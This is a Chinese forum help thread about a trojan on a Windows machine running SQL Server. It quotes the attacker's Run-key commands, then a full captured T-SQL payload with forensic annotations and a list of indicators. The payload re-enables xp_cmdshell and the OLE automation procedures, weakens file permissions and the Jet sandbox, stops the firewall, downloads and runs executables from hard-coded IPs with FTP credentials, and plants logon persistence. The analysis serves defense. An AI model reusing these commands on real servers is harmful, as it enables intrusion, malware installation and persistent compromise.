

【求助】cmd.exe /c net1 stop 木马


http://zhidao.baidu.com/question/263547971.html#here
类似的问题
我弟的机器是 Win7，安装畅捷通 T3 系列管理软件时顺带安装了 SQL Server 数据库；本机中招后发现的恶意命令如下（每条都是先停掉 Windows 防火墙服务 sharedaccess，再写 ftp 脚本下载并运行一个 exe）：
c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 121.9.213.89 >cmd.txt&echo 123>>cmd.txt&echo binary >>cmd.txt&echo get qq.exe>>cmd.txt&echo bye>>cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&qq.exe&qq.exe&del cmd.txt /q/f&
c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 221.204.213.70 >cmd.txt&echo 123>>cmd.txt&echo binary >>cmd.txt&echo get 2.exe>>cmd.txt&echo bye>>cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&qq.exe&qq.exe&del cmd.txt /q/f&ex
在下面这篇文章的结尾看到了同一类命令（文中是通过 SQL Server 的 xp_cmdshell / sp_OACreate 执行，并写入 HKLM\...\Run 启动项），但看不懂具体含义：
http://xxx343219114.blog.163.com/blog/static/18053314420111174195992/

2011年02月17日

-- ==========================================================================
-- CAPTURED ATTACKER PAYLOAD (T-SQL), quoted from the blog post linked above.
-- Do NOT execute. The batches below re-enable OS command execution on a
-- SQL Server instance and are annotated here for forensic analysis only.
-- This first batch removes the system wrappers around DBCC addextendedproc /
-- dropextendedproc so the attacker can redefine them.
-- ==========================================================================
use Master
-- Only the first DROP is guarded by the IF (there is no BEGIN/END), so the
-- DROP of sp_addextendedproc runs unconditionally and errors if the
-- procedure is absent or cannot be dropped on this SQL Server version.
If object_id('sp_dropextendedproc') is not null
drop procedure sp_dropextendedproc
drop procedure sp_addextendedproc
go
-- Attacker's replacement for sp_dropextendedproc. The body is a corrupted
-- paste of the stock sp_addextendedproc body: the procedure declares only
-- @functname but reads @dllname, which is never declared, so this CREATE
-- should fail ("Must declare the scalar variable") and the system procedure
-- dropped in the previous batch is simply gone. Later calls to
-- sp_dropextendedproc therefore error out instead of dropping anything.
create procedure dbo.sp_dropextendedproc
@functname nvarchar(517) -- name of the extended procedure to (un)register
as
-- Refuse to run inside a transaction; mirrors the stock system procedure
-- (15002 is the "cannot be executed within a transaction" message).
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sys.sp_dropextendedproc')
return (1)
end
-- @dllname is not a parameter of this procedure: undeclared variable.
if @dllname is null or datalength(@dllname) = 0
begin
raiserror(15311,-1,-1,@dllname)
return (1)
end
-- DBCC addextendedproc is the undocumented primitive that sp_addextendedproc
-- wraps; calling it directly bypasses the (now dropped) wrapper.
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
-- Orphaned tail of the real sp_dropextendedproc body (the part that should
-- have been inside the CREATE above). At batch level @functname is
-- undeclared, so this batch fails as well and has no effect.
-- Drop the extended procedure mapping.
dbcc dropextendedproc( @functname )
return (0) -- sp_dropextendedproc
GO
-- Stage 1: restore the OLE Automation procedures and stage renamed copies of
-- ftp.exe / cacls.exe so later batches can run them even if the originals
-- are blocked or removed by name.
-- 'show advanced options' is set but never followed by RECONFIGURE, so the
-- setting is never applied; this line is effectively a no-op.
exec sp_configure 'show advanced options', 1;
-- Re-register sp_OACreate / sp_OASetProperty / sp_OADestroy / sp_OAMethod
-- from odsole70.dll wherever a defender has removed them (SQL 2000-style
-- registration via DBCC; on 2005+ the 'Ole Automation Procedures' option
-- would also have to be enabled for these to work).
if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))dbcc addextendedproc ('sp_OACreate','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))dbcc addextendedproc ('sp_OASetProperty','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))dbcc addextendedproc ('sp_OADestroy','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))dbcc addextendedproc ('sp_OAMethod','odsole70.dll');
-- Scripting.FileSystemObject.CopyFile: ftp.exe -> p.exe and cacls.exe ->
-- cs.exe, attempted from both system32 and dllcache. p.exe is invoked later
-- as a fallback for ftp ("ftp -s:cmd.txt&p -s:cmd.txt"); cs.exe is used
-- on the next line.
declare @passwordo2 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo2 out;exec sp_oamethod @passwordo2, 'copyfile',null,'c:\windows\system32\ftp.exe' ,'c:\windows\system32\p.exe';
declare @passwordo3 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo3 out;exec sp_oamethod @passwordo3, 'copyfile',null,'c:\windows\system32\dllcache\cacls.exe' ,'c:\windows\system32\cs.exe';
declare @passwordo int;exec sp_oacreate 'scripting.filesystemobject', @passwordo out;exec sp_oamethod @passwordo, 'copyfile',null,'c:\windows\system32\cacls.exe' ,'c:\windows\system32\cs.exe';
declare @passwordo4 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo4 out;exec sp_oamethod @passwordo4, 'copyfile',null,'c:\windows\system32\dllcache\ftp.exe' ,'c:\windows\system32\p.exe';
-- WScript.Shell.Run of the renamed cacls: "/e /t /g system:F" edits the ACL
-- recursively and grants SYSTEM full control on cmd.exe, net1.scr and
-- msado15.dll -- presumably undoing ACL hardening an administrator applied
-- to these files. net1.scr is not a standard filename (likely a renamed
-- net1.exe; unconfirmed). @passwordcmdcov is created but never used.
declare @passwordcmdcov INT;declare @passwordcmdcov1 INT;declare @passwordftpcov INT;exec sp_OACreate 'wscript.shell',@passwordcmdcov output;exec sp_OACreate 'wscript.shell',@passwordcmdcov1 output;exec sp_OACreate 'wscript.shell',@passwordftpcov output;exec sp_OAMethod @passwordftpcov,'run',null,'cs.exe %SystemRoot%\system32\cmd.exe /e /t /g system:F';exec sp_OAMethod @passwordcmdcov1,'run',null,'cs.exe %SystemRoot%\system32\net1.scr /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'cs.exe C:\Progra~1\Common~1\System\ado\msado15.dll /e /t /g system:F';
go
-- Stage 2: re-register xp_cmdshell and a broad set of xp_* / sp_OA*
-- extended procedures in master, in case a defender dropped them.
-- If the DROP of sp_addextendedproc in the first batch succeeded, every EXEC
-- in this batch fails ("Could not find stored procedure") and the script
-- falls back to the raw DBCC calls that follow; whether the drop succeeds is
-- version-dependent.
use master
-- xpweb70.dll and xp_cmdshell.dll are not Microsoft DLL names; those two
-- registrations only work if the attacker placed such a DLL on disk.
-- xplog70.dll is the DLL that backs xp_cmdshell on SQL Server 2000.
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xpweb70.dll'
-- "declare @o int" is glued onto the end of this line and never used.
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'
-- File-system, group/login and error-log enumeration procs.
exec sp_addextendedproc xp_dirtree,'xpstar.dll'
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
-- OLE Automation procs from odsole70.dll (sp_OACreate is listed twice).
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
-- Registry procs; xp_regwrite is what the final batches use for the Jet
-- SandBoxMode change and the HKLM Run persistence entry.
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
GO
-- Stage 3: the same registrations through raw DBCC addextendedproc, which
-- does not depend on the sp_addextendedproc wrapper still existing. The
-- calls are repeated in several batches, apparently so that at least one
-- variant succeeds regardless of which earlier step failed.
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
GO
dbcc addextendedproc ("xp_cmdshell","xpweb70.dll")
GO
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
GO
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
GO
GO
-- Calls the attacker-redefined sp_dropextendedproc (which, as written above,
-- registers rather than drops -- if it was created at all).
exec sp_dropextendedproc 'xp_cmdshell'
GO
-- Loads xp_cmdshell from C:\Windows\System rather than System32: a
-- non-standard path, suggesting an attacker-supplied copy of xplog70.dll.
dbcc addextendedproc ("xp_cmdshell","C:\Windows\System\xplog70.dll")
GO
-- Stage 4: a near-verbatim repeat of Stage 1 (OLE Automation restore, copy
-- ftp.exe -> p.exe and cacls.exe -> cs.exe, ACL grants). The only difference
-- is the last cacls target: ftp.exe here instead of msado15.dll.
-- Again no RECONFIGURE follows, so this sp_configure call changes nothing.
exec sp_configure 'show advanced options', 1;
if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))dbcc addextendedproc ('sp_OACreate','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))dbcc addextendedproc ('sp_OASetProperty','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))dbcc addextendedproc ('sp_OADestroy','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))dbcc addextendedproc ('sp_OAMethod','odsole70.dll');
-- Renamed copies: p.exe (ftp) and cs.exe (cacls), from system32 and dllcache.
declare @passwordo2 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo2 out;exec sp_oamethod @passwordo2, 'copyfile',null,'c:\windows\system32\ftp.exe' ,'c:\windows\system32\p.exe';
declare @passwordo3 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo3 out;exec sp_oamethod @passwordo3, 'copyfile',null,'c:\windows\system32\dllcache\cacls.exe' ,'c:\windows\system32\cs.exe';
declare @passwordo int;exec sp_oacreate 'scripting.filesystemobject', @passwordo out;exec sp_oamethod @passwordo, 'copyfile',null,'c:\windows\system32\cacls.exe' ,'c:\windows\system32\cs.exe';
declare @passwordo4 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo4 out;exec sp_oamethod @passwordo4, 'copyfile',null,'c:\windows\system32\dllcache\ftp.exe' ,'c:\windows\system32\p.exe';
-- Grant SYSTEM full control on cmd.exe, net1.scr and ftp.exe via the renamed
-- cacls (cs.exe). @passwordcmdcov is created but never used.
declare @passwordcmdcov INT;declare @passwordcmdcov1 INT;declare @passwordftpcov INT;exec sp_OACreate 'wscript.shell',@passwordcmdcov output;exec sp_OACreate 'wscript.shell',@passwordcmdcov1 output;exec sp_OACreate 'wscript.shell',@passwordftpcov output;exec sp_OAMethod @passwordftpcov,'run',null,'cs.exe %SystemRoot%\system32\cmd.exe /e /t /g system:F';exec sp_OAMethod @passwordcmdcov1,'run',null,'cs.exe %SystemRoot%\system32\net1.scr /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'cs.exe %SystemRoot%\system32\ftp.exe /e /t /g system:F';
go
-- Stage 5: Jet sandbox setting plus launch of an unknown binary.
-- SandBoxMode=1 limits the Jet expression sandbox to Access itself, so Jet
-- queries issued from other hosts (e.g. SQL Server through OLE DB) are not
-- sandboxed -- the usual setup for the Jet "Shell()" sandbox-escape trick.
exec master..xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
go
-- Runs mcsql.exe via WScript.Shell. The binary is not referenced anywhere
-- else in this capture, so its origin and purpose cannot be determined
-- from the script alone.
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'mcsql.exe'--
go
go
-- Creates a new Jet (Access-format) database file named SysS.xml through
-- ADOX.Catalog.Create. The script never references the file again, so its
-- purpose is unconfirmed (presumably staging for the Jet sandbox technique
-- enabled above). @hr is assigned but never checked.
declare @hr int
declare @object int;declare @property int
exec @hr = sp_OACreate 'ADOX.Catalog',@object OUTPUT
exec @hr = sp_OAMethod @object,'Create',@property output,'Provider=Microsoft.Jet.OLEDB.4.0;Data Source=SysS.xml'
go
-- Drop and re-register xp_cmdshell once more, from the standard DLL.
drop procedure xp_cmdshell
go
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
go


-- Stage 6: the actual download-and-execute payload, then persistence.
-- Command chain: stop the Windows Firewall / ICS service (sharedaccess),
-- write an ftp script to cmd.txt (open 59.173.12.54, two response lines
-- "123" and "sb91211" -- presumably username and password -- binary mode,
-- get cao.exe, bye), run it with ftp.exe and again with the renamed copy
-- p.exe, execute cao.exe, then delete the script.
-- Variant 1: through xp_cmdshell.
exec master..xp_cmdshell 'net1 stop sharedaccess&echo open 59.173.12.54> cmd.txt&echo 123>> cmd.txt&echo sb91211>> cmd.txt&echo binary >> cmd.txt&echo get cao.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&cao.exe&cao.exe&del cmd.txt /q /f&exit'
GO
-- Variant 2: the identical chain through WScript.Shell.Run, for the case
-- where xp_cmdshell is unavailable.
declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',null,'cmd /c "net1 stop sharedaccess&echo open 59.173.12.54> cmd.txt&echo 123>> cmd.txt&echo sb91211>> cmd.txt&echo binary >> cmd.txt&echo get cao.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&cao.exe&cao.exe&del cmd.txt /q /f&exit"'
GO
-- Drop xp_cmdshell and re-register it with a taunt string as the "DLL
-- name". That leaves xp_cmdshell unusable on this instance -- possibly to
-- lock out other intruders; the taunt is aimed at whoever blocks port 1433
-- (the MSSQL port), which points at brute-forced SQL logins as the way in.
drop procedure xp_cmdshell
gO
exec sp_addextendedproc xp_cmdshell,'封1433的狗 哥永远鄙视你 你是你妈臭逼啊?你能封就封的彻底点 by:343219114 非法操作ヽ '
gO
-- Jet SandBoxMode=1 again (same registry write as in Stage 5).
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
GO
-- Persistence: an HKLM\...\CurrentVersion\Run value named "shell" re-runs
-- the whole chain at every logon. It has the same form as the command the
-- original poster found on the infected Win7 machine (different IP/file).
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','shell','REG_SZ','c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 59.173.12.54> cmd.txt&echo 123>> cmd.txt&echo sb91211>> cmd.txt&echo binary >> cmd.txt&echo get cao.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&cao.exe&cao.exe&del cmd.txt /q /f&exit'
GO
-- NOTE(review): artefacts this script leaves on a host that ran it --
-- registry: HKLM\Software\Microsoft\Windows\CurrentVersion\Run\shell and
-- HKLM\Software\Microsoft\Jet\4.0\Engines\SandBoxMode=1; files: cmd.txt,
-- cao.exe, p.exe, cs.exe, SysS.xml, mcsql.exe; a stopped sharedaccess
-- (Windows Firewall) service; outbound FTP to 59.173.12.54. The poster's
-- own sample adds 121.9.213.89 / 221.204.213.70 and qq.exe / 2.exe.



回复 1F 圆融 的帖子



其余暂未被报毒的样本已收集，并已反馈处理。

回复:【求助】cmd.exe /c net1 stop 木马

1、文件名:362.vbs
不是病毒

2、文件名:363.VBS
不是病毒

3、文件名:gbencoder[1].vbs
不是病毒

4、文件名:proxy[1].vbs
不是病毒

5、文件名:pp.vbs
不是病毒

6、文件名:svdnost.vbs
不是病毒

7、文件名:病毒2.rar
不是病毒